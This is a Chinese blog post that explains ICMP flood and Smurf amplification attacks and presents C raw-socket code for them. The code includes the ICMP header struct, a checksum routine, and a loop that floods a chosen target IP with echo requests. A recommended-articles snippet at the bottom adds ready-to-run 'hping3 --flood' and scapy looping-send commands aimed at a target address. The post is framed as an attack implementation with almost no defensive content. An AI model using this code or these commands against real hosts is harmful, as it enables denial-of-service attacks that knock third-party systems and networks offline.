ICMP flood攻击

最新推荐文章于 2024-07-08 10:45:34 发布
最新推荐文章于 2024-07-08 10:45:34 发布
阅读量1.2w 收藏 5
点赞数 1
分类专栏: socket 文章标签: socket c++ 网络攻击 ICMP flood


icmp flood属于flood的其中一种.

达到效果有以下实现方法

1.两败俱伤 此处转载自http://hi.baidu.com/1tata/item/7bcfcd2e330d490c72863e8e

大量的 ICMP消息发送给目标系统,使得它不能够对合法的服务请求做出响应。中美黑客大战中的多数中国黑客采用的正是此项技术。ICMP FLOOD攻击实际上是一种两败俱伤的攻击方式,在主机"疯狂"地向攻击目标发送ICMP消息的时候,主机也在消耗自身的系统资源。如果自身的网络资源小 于目标的话,这种攻击就是"蚍蜉撼大树"。因此,ICMP FLOOD攻击为了达到很好的效果,往往要联合多台机器同时攻击同一台机器,从而形成分布式拒绝服务攻击(DDoS)。

2.借刀杀人 此处转载自http://hi.baidu.com/1tata/item/a3d466d06a283e14d90e44b1

攻击者向许多地址发送ICMP Echo Request,但是它却告诉这些地址ICMP Echo Request不是它自己发的,而是"某某"发的,这个"某某"就会成为"众矢之的"。通过伪装目的主机的IP地址,向多个IP 网络的广播地址发送ICMP Echo Request数据包,使得目的主机需要消耗大量CPU 资源和有效带宽来处理来自众多节点的ICMP Reply数据包。该攻击的原理如下图:


从图中可以看出,带宽仅为128Kbps的攻击者可以击溃带宽比其更大(512Kbps)的目标,因为ICMP SMURF采用的手段是"借刀杀人"!它本身并不向目标发送ICMP消息,而是向许多远程主机"诬告"攻击目标向他们发送了ICMP Echo,于是这些远程主机纷纷向攻击目标发送ICMP Reply,导致攻击目标崩溃。有明一代名将袁崇焕督师就是因为满人的反间计而被崇祯凌迟,并被当时的北京市民争其肉而食的。网络攻击中的"借刀杀人"照 样威力无穷。



下面先介绍一下ICMP的组成




// 定义ICMP首部
typedef  struct _icmphdr{
unsigned  char i_type;  // 8位类型
unsigned  char i_code;  // 8位代码
unsigned  short i_cksum;  // 16位校验和, 从TYPE开始,直到最后一位用户数据,如果为字节数为奇数则补充一位
unsigned  short i_id ;  // 识别号(一般用进程号作为识别号), 用于匹配ECHO和ECHO REPLY包
unsigned  short i_seq ;  // 报文序列号, 用于标记ECHO报文顺序
unsigned  int timestamp;  // 时间戳

}ICMP_HEADER; 

计算校验和的经典函数: 

复制代码
SHORT checksum(USHORT* buffer,  int size)
{
    unsigned  long cksum =  0;
     while(size> 1)
    {
        cksum += *buffer++;
        size -=  sizeof(USHORT);
    }
     if(size)
    {
        cksum += *(UCHAR*)buffer;
    }
    cksum = (cksum>> 16) + (cksum& 0xffff); 
    cksum += (cksum>> 16); 
     return (USHORT)(~cksum);

第一种实现的部分代码如下,2014年4月1日 01:36:21

	/生成ICMP会送请求报文
	char icmp_data[65535]={0};					//要发送的字符串

	((IcmpHeader*)icmp_data)->chksum=0;
	((IcmpHeader*)icmp_data)->type=8;				//会送请求
	((IcmpHeader*)icmp_data)->code=0;				//
	((IcmpHeader*)icmp_data)->id=2;	
	((IcmpHeader*)icmp_data)->timestamp=GetTickCount();         //设置时间戳
	((IcmpHeader*)icmp_data)->seq=0;                             //序列号

	memset(icmp_data+sizeof(IcmpHeader),'E',PACKET_SIZE);
	((IcmpHeader*)icmp_data)->chksum=
        checksum((USHORT*)icmp_data,sizeof(IcmpHeader)+PACKET_SIZE);  //填入校验和
	int datasize=sizeof(IcmpHeader)+PACKET_SIZE;

	//开始发送数据报文了
	sockaddr_in dst;
	dst.sin_family=AF_INET;
	dst.sin_addr.S_un.S_addr=inet_addr(dstIP);
	DWORD dwStart=GetTickCount();
	while(GetTickCount()-dwStart<10)          //程序运行10秒后退出
	sendto(sockRAW,icmp_data,datasize,0,(struct sockaddr*)&dst,sizeof(dst));
 

 

效果图2014年4月1日 01:42:33
 


 
 


 

                

        

        

    




    

      

        

            

              
                
                  hwhaocool
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    1
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    5
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
Linux编程之ICMP洪水攻击

				
			

			

				

					09-15
				

			

		

		

			
				
主要为大家详细介绍了Linux编程之ICMP洪水攻击的相关资料,具有一定的参考价值,感兴趣的小伙伴们可以参考一下

			
		

	



                

              
                



	

		

			

				
					
ICMP flood(ICMP洪水攻击)

					
热门推荐

				
			

			

				

					marywang56的专栏
				

				

					07-24
					
					2万+
					
				

			

		

		

			
				
最近在学习DDos相关知识,参考一些只是,做了摘要,供自己参考。  
参考:http://blog.csdn.net/xlf13872135090/article/details/8059538什么是ICMP协议? 
ICMP是(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议族的一个子协议,用于在IP主机、路由器之间传递控制消息

			
		

	



                


  
              

                


	

		

			

				
					
ICMP Flood攻击是一种网络攻击方式

				
			

			

				

					qq_73992463的博客
				

				

					11-02
					
					783
					
				

			

		

		

			
				
ICMP Flood攻击是一种网络攻击方式,旨在通过发送大量虚假的ICMP(Internet Control Message Protocol)回应消息来消耗目标系统的资源。本文将全面介绍ICMP Flood攻击的定义、攻击方式、攻击架构、防护措施以及与其他攻击方式相比的优势和缺点。

			
		

	





	

		

			

				
					
ICMP Flood攻击

					
最新发布

				
			

			

				

					m0_53840070的博客
				

				

					07-08
					
					766
					
				

			

		

		

			
				
这些报文短时间内大量涌向目标主机,并要求目标主机回应报文,一来一去,大量往返的报文,两者汇集起来的流量,致使目标主机资源耗尽,网络带宽饱和,系统陷入瘫痪,从而无法正常。包,用以消耗主机资源,主机资源被耗尽后,就会陷入瘫痪,从而无法正常提供服务。所以要想达到这个目标,需要在一个网段至少部署三台主机,其中一台服务器,是受害主机,承担。攻击者需要全方位的发起攻击,一般来说需要几个、几十个主机同时对一台服务器发起攻击攻击没有什么特别技巧,靠的就是力大身沉,用巨量的数据把对方淹没。一台客户机进行攻击前后的验证。

			
		

	



		

			
		



	

		

			

				
					
ip icmp flood 等 常见的攻击

				
			

			

				

					phone1126的专栏
				

				

					09-12
					
					6816
					
				

			

		

		

			
				
SYN Flood攻击:

  在TCP连接的三次握手中,假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成),这 种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接,这段时间的长度我们称为SYN Timeout,一般来说这个时间是分钟的数量级(大约为30秒 ...

			
		

	





	

		

			

				
					
浅析ICMP洪水攻击

				
			

			

				

					
				

				

					03-23
					
					5527
					
				

			

		

		

			
				
一、什么是ICMP协议?ICMP全称Internet Control Message Protocol(网际控制信息协议)。提起ICMP,一些人可能会感到陌生,实际上,ICMP与我们息息相关。在网络体系结构的各层次中,都需要控制,而不同的层次有不同的分工和控制内容,IP层的控制功能是最复杂的,主要负责差错控制、拥塞控制等,任何控制都是建立在信息的基础之上的,在基于IP数据报的网络体系中,网关必须自

			
		

	





	

		

			

				
					
ICMP协议原理与泛洪攻击

				
			

			

				

					嘿嘿嘿
				

				

					01-23
					
					529
					
				

			

		

		

			
				
通过icmp协议当网络中数据包传输出现问题时,主机或设备就会向上层协议报告差错情况和提供有关异常情况的报告,使得上层协议能够通过自己的差错控制程序来判断通信是否正确,以进行流量控制和差错控制,从而保证服务质量。因为ICMP报文被封装在IP数据包内部,其中并没有记录报文在网络传递中的全部路径,因此无法中途通知或判别哪个设备出错,更没有纠错能力,只能向源端发送差错报告,源端格局报文就能推断错误。攻击者在短时间内向目标设备发送大量的ICMP虚假报文,导致目标设备忙于应付无用报文,而无法为用户提供正常服务。

			
		

	





	

		

			

				
					
DDoS_Corr_Engine:基于机器学习的DDoS检测(HTTP,UDP,TCP和ICMP Flood攻击

				
			

			

				

					05-09
				

			

		

		

			
				
 使用DNNClassification进行DDoS攻击检测 所需包装的熊猫pip install pandas  张量流pip install tensorflow  MySQL数据库pip install mysqldb  您可以通过对MySQLConnection.py进行一些更改来使用任何其他数据库 ...

			
		

	





	

		

			

				
					
ICMP Flood.pdf

				
			

			

				

					11-16
				

			

		

		

			
				
ICMP Flood】是一种网络攻击方式,通过大量发送Internet控制消息协议(ICMP)的数据包,使得目标系统因处理过多的ICMP请求而资源耗尽,从而导致服务中断。这种攻击通常被称为“ping洪水攻击”或“ICMP洪水攻击”。...

			
		

	





	

		

			

				
					
测试syn-flood等泛洪攻击的小软件

				
			

			

				

					10-26
				

			

		

		

			
				
可以模拟syn flood udp flood等泛洪攻击的一款小软件,360会报警。

			
		

	





	

		

			

				
					
基于令牌桶算法在抵御Flood攻击系统中的实现

				
			

			

				

					07-04
				

			

		

		

			
				
常见的Flood攻击类型包括SYN Flood攻击ICMP Flood攻击和UDP Flood攻击。这些攻击手段通常是针对网络协议栈的漏洞,利用协议特性的缺陷发起攻击。  在抵御洪水攻击时,令牌桶算法的作用体现在它能够平滑网络流量,...

			
		

	





	

		

			

				
					
​​​​网络编程探索系列 —— 洪水网络攻击

				
			

			

				

					weixin_73951752的博客
				

				

					04-13
					
					2395
					
				

			

		

		

			
				
洪水攻击,也被称为拒绝服务攻击(DoS),是一种旨在通过使网络或系统资源耗尽来阻止用户访问服务的攻击手段。这种攻击通常通过发送大量请求来淹没目标系统,导致合法用户无法访问服务,其中主要利用了网络协议的安全机制或者直接使用十分简单的大量ping资源的方法来对目标机造成影响。

			
		

	





	

		

			

				
					
ICMP Flood防范

				
			

			

				

					qq_47529104的博客
				

				

					04-20
					
					1521
					
				

			

		

		

			
				
ICMP Flood防御原理

介绍ICMP flood攻击和防御原理

攻击者短时间内发送大量的ICMP报文到被攻击目标,导致依靠会话转发的网络设备会话耗尽引起网络瘫痪,如果采用超大报文攻击也会导致网络链路拥塞。比如ping命令上面就有某个选项可以调整ICMP报文的发送大小,最大时65500B,在一些普通的主机上都没有对这个大ICMP包进行防范,所以如果没有对ICMP的大小进行限制那么毫无疑问将会产生十分严重的后果。所以一般来说,如果我们在网络上使用ping命令去制造一些大的ICMP报文希望某些网站的服

			
		

	





	

		

			

				
					
【TCP/IP】ICMP flood

				
			

			

				

					Hello,My Friends~
				

				

					07-27
					
					1211
					
				

			

		

		

			
				
背景:作者深受大学舍友的“迫害”,大晚上不睡觉,劈里啪啦打游戏,故因此学习网络攻击手段,目的让舍友的网络瘫痪。

前提:1、具有一定的Linux系统基础

2、具有一定的TCP/IP协议知识

准备:作者的笔记本安装的Linux虚拟机,Linux系统搭入网络,由于作者是个英语渣,还将Linux系统汉化处理。

原理:

1、什么是ICMPICMP是Internet控制报文协议。它是TCP/I...

			
		

	





	

		

			

				
					
泛洪攻击的几种方法解析 

				
			

			

				

					国际海员
				

				

					02-26
					
					2万+
					
				

			

		

		

			
				
ICMP,SYN TCP,UDP Flood,TCP land......

			
		

	





	

		

			

				
					
SYN,ICMP, UDP Flood攻击原理与防护

				
			

			

				

					mojirener的博客
				

				

					01-05
					
					2328
					
				

			

		

		

			
				
DoS(Denial of Service拒绝服务)和DDoS(Distributed Denial of Service分布式拒绝服务)攻击是大型网站和网络服务器的安全威胁之一。2000年2月,Yahoo、亚马逊、CNN被攻击等事例,曾被刻在重大安全事件的历史中。SYN Flood由于其攻击效果好,已经成为目前最流行的DoS和DDoS攻击手段。今天我们就来讲解一下SYN,ICMP, UDP Flood攻击原理与防护

  SYN Flood利用TCP协议缺陷,发送了大量伪造的TCP连接请求,使得被攻击方资

			
		

	





	

		

			

				
					
浅谈ICMP Flood***原理

				
			

			

				

					weixin_33893473的博客
				

				

					05-13
					
					465
					
				

			

		

		

			
				
我们经常听到常规主流的DDOS***、CC***,SYN Flood***,HTTPS***等,刚好有客户问ICMP Flood***是什么?那我们今天就谈谈ICMP Flood***原理吧。ICMP Flood(即ICMP 洪水***):当 ICMP ping 产生的大量回应请求超出了系统的最大限度,以至于系统耗费所有资源来进行响应直至再也无法处理有效的网络信息流,这就是 ICMP 洪水***。...

			
		

	





	

		

			

				
					
DDOS攻击与防御(一)

				
			

			

				

					qq_54434273的博客
				

				

					09-29
					
					2178
					
				

			

		

		

			
				
DDOS攻击与防御

			
		

	





	

		

			

				
					
kali实现icmp flood 攻击

				
			

			

				

					04-04
				

			

		

		

			
				
ICMP Flood攻击是一种常见的网络攻击方式,它利用Internet控制消息协议(ICMP)来发送大量的ICMP请求给目标主机,从而使目标主机无法正常工作。Kali Linux是一个流行的渗透测试和安全评估工具,它提供了各种工具和功能来进行网络攻击和防御。

要在Kali Linux上实现ICMP Flood攻击,可以使用工具中的hping3或scapy。这两个工具都可以生成和发送自定义的ICMP数据包。

1. 使用hping3进行ICMP Flood攻击:
   首先,确保你已经安装了hping3工具。在终端中输入以下命令来安装hping3:
   ```
   sudo apt-get install hping3
   ```
   然后,使用以下命令执行ICMP Flood攻击:
   ```
   sudo hping3 -1 --flood 目标IP地址
   ```
   这将发送大量的ICMP请求给目标IP地址,可能会导致目标主机无法正常工作。

2. 使用scapy进行ICMP Flood攻击:
   首先,确保你已经安装了scapy工具。在终端中输入以下命令来安装scapy:
   ```
   sudo apt-get install scapy
   ```
   然后,使用以下Python代码执行ICMP Flood攻击:
   ```python
   from scapy.all import *

   target_ip = "目标IP地址"
   packet = IP(dst=target_ip)/ICMP()
   send(packet, loop=True)
   ```
   这段代码将创建一个ICMP数据包并发送给目标IP地址,循环发送直到手动停止。

请注意,进行任何形式的网络攻击都是非法和不道德的行为。上述示例仅用于教育和研究目的,请确保在合法和授权的环境中使用这些工具。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值